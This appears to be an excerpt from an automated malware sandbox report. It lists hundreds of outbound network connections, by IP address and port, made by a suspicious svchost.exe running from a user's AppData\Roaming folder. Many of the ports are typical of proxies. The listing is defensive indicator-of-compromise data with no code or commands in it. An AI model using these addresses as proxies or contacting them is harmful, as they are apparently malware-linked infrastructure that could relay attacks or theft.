                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 217.115.115.253 56792
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.49.30.5 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.106.115.50 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 77.46.138.37 33608
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.17.9.114 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 138.0.228.120 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 20.33.5.27 8888
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 194.4.50.127 12334
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 62.3.6.76 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.19.59.19 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.139.242.1 84
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.12.178.107 29985
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.148.28.218 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 203.96.177.211 33382
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 23.152.40.14 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.76.253.66 3129
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.223.108.13 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.236.0.129 22167
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 107.180.88.173 35774
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 88.198.82.189 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.190.24.119 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.169.249.16 8362
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 166.62.38.100 56191
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 92.205.110.47 14936
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 46.253.143.144 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.125.215.188 8090
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 111.91.231.65 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.76.217.175 8088
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 58.69.201.117 8082
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 14.207.167.114 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 187.122.105.181 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.167.38.7 45650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.6.97 59991
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 95.87.30.11 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.235.9 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 173.212.206.86 55405
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.158.204 52980
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 198.49.68.80 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.229.100.73 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.172.120.91 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 37.187.77.58 19767
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 114.141.61.2 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.20.179.187 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.13.204.24 8082
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 92.204.135.37 26927
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.189.116.108 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 138.36.150.15 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 64.201.163.133 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 138.36.150.16 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.19.106.11 12334
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 38.156.73.54 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 191.97.16.160 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 200.94.96.174 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.231.110.26 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 35.237.210.215 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.110.34.243 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 124.163.236.54 7302
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 157.245.157.72 60490
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.195.225.34 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 161.97.147.193 43131
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 87.247.251.240 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.214.112.68 32323Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 109.236.47.242 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.26.241.120 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 138.36.150.28 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.92.204.54 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 38.156.73.61 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 85.113.55.123 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.189.163.210 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.217.223.145 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 83.220.234.102 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.19.225.70 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 34.49.208.221 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.200.12.81 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.10.160.90 25257
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.174.102.127 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.51.112.169 5430
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 116.118.98.9 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.130.106.169 83
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 143.208.152.60 3180
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.255.224 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.4.123.41 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.131.29.213 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 44.190.9.65 48100
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.234.55.173 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.200.12.83 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.92.4.113 35528
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 209.14.112.2 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 83.221.222.240 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 209.14.112.3 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.200.12.84 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.38.181.129 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 217.172.122.14 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 35.154.71.72 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.33.163.156 42380
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 109.70.189.30 38880
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 173.249.29.243 9123
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 121.205.69.62 21212
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 98.175.31.195 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.217.158.202 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.243.102.207 9764
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 109.164.38.189 2306
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 54.233.119.172 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.44.82.2 38080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.10.160.170 1911
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.21.223.181 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 117.30.118.200 8118
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 60.188.102.225 18080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 109.87.172.133 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 3.128.142.113 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.131.63.44 3128Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.10.160.173 10677
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 203.154.39.146 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 171.100.22.133 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 72.10.160.171 5369
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 74.207.241.80 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.78.95.41 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.191.127.21 8090
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 157.100.6.202 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.78.95.40 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 39.108.229.14 8002
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 15.207.196.77 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.127.1.130 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 116.58.227.224 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.3.37.213 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 80.169.243.234 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 110.74.195.239 51080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 130.255.162.199 44234
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 3.24.58.156 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 209.97.176.112 11793
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.90.223.124 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 120.194.4.157 5443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.12.253.232 57447
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.207.38.66 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 101.255.165.130 1111
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 148.72.212.212 33905
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.126.173.73 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 62.182.114.164 59623
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.192.102.249 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.35.32.249 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.222.241.157 27206
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 49.7.11.187 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.219.133.106 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 128.199.221.91 33383
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 141.8.195.143 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.55.26.132 31280
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.54.21.203 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 197.248.249.147 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.164.116.172 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 38.7.4.89 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 141.98.248.19 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.4.117.153 5020
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 183.80.130.9 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 160.248.80.91 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 167.99.131.11 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.149.103.133 61859
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 117.241.132.95 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.129.199.57 8800
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.77.108.208 9050
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.105.234 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.117.225.195 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.150.151.138 4995
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 163.172.131.178 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.89.16.111 49528
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.236.160.186 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 66.171.186.47 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.93.68.47 41890
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.128.133.1 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.254.198.237 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.177.217.131 52858
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.242.3.214 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 203.202.253.108 5020
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.172.42.121 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 161.97.173.42 53948
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.57.245.250 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 165.227.82.7 24668
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.18.149.110 5020
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.109.184.150 56067
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 49.51.93.222 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 114.231.45.178 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.72.82.9 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.98.93.234 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.190.192.57 61221
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.149.194.40 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.17.248.164 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 108.181.132.115 35850
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.137.111.231 8086
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.81.220.33 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.35.15 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 222.223.103.232 7302
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.59.243.214 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.110.59.82 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 161.97.173.78 35981
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.206.38.46 37630
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.236.97 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 67.213.210.175 25155
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 148.72.206.250 35703
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.23.252.168 9180
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 37.187.91.192 21981
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 64.225.48.234 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.111.160.41 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 107.180.88.41 58037
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.79.254.236 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 198.23.176.76 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 124.223.186.186 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.234.194.155 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.145.137.102 37447
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 140.83.32.175 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 52.73.224.54 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 82.165.105.48 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.214.227.68 60433
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.92.77.241 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 70.166.167.38 57728
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 148.72.206.84 2536
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.172.218.164 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.25.64.27 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.82 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 199.58.185.9 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 207.180.198.241 17228
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.80 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.240.208.98 43704
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 67.213.210.168 46716
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 61.133.66.69 9002
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.13.78.93 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 85.25.177.53 58851
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.135.83.214 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.239.166 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.239.1 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.153.154.6 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 149.202.91.219 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 107.181.161.81 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.20.123.164 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.237.218.68 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.118.132.180 45449
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 139.129.162.65 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 161.97.163.52 45063
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 189.201.191.75 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.65.77.168 8585
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.94.231.93 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.86.46.112 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.143.143.125 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.210.57.243 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 89.249.65.191 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.143.143.126 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 14.103.24.20 8000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 92.255.88.219 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.78.100.162 3629
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.77.96.145 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.252.220.89 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.236.189.13 1976
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.87.255.155 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.137.197 42350
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.180.222.134 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.69.9 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.9.169.87 30000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.145.228.212 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.88.57.203 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.28.121.58 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.15.132.215 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.81.153.162 3389
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.17.213.98 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 89.42.166.163 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.239.190 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.93.44.53 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.238.228.240 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.169.214.249 45108
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.69.90.57 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.21.56.20 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.178.33.86 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.243.114.192 8180
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.60.232.18 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.93.196.242 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 79.110.196.145 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 98.162.25.29 31679
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.83.118.9 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.89.10.51 44268
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 121.101.135.46 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.90.126.78 8118
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.59.2.183 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.194.11.180 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.128.133.239 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.161.99.114 48235
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 70.166.167.55 57745
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 132.148.16.169 11320
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.220.174.99 59967
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.4.58.22 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.112.125.44 45555
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 80.191.169.69 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 222.255.238.159 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.49.31.207 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.77.220 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 114.106.137.152 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.24.136.68 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 128.140.26.12 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.214.225.223 43435
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.222.241.8 36219
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 171.228.159.253 5307
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.231.22.229 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 80.228.235.6 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 18.134.236.231 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.196.168.183 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 184.178.172.5 15303
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.238.12.4 3128Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.140.189.95 29003
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 83.143.24.66 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.160.207.49 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 68.71.254.6 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.81.217.201 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.35.189.217 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 112.196.112.243 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.222.245.41 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.45.74.60 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.25.167.88 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.71.3.60 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 163.172.147.89 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.232.245.132 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.117.109.9 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.217.220.214 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.62.235.18 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.105.228.66 8080
